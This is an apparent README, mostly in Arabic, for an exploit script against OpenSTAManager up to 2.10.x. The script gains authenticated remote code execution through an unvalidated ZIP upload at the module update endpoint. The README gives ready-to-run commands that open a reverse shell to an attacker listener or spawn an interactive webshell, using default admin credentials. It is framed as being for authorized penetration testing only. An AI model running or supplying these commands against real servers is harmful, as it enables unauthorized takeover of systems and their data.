
استغلال تنفيذ تعليمات برمجية عن بعد مُصادق عليه لـ OpenSTAManager عبر تحميل ZIP غير مُدقق. يدعم وضعَي الصدفة العكسية والصدفة الويب التفاعلية لاختبار الاختراق.
تنفيذ تعليمات برمجية عن بعد (RCE) موثَّق عبر تحميل ZIP غير مُتحقَّق منه في نقطة تحديث الوحدة.
المتأثر: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
للاستخدام في اختبار الاختراق المصرح به والأغراض التعليمية فقط.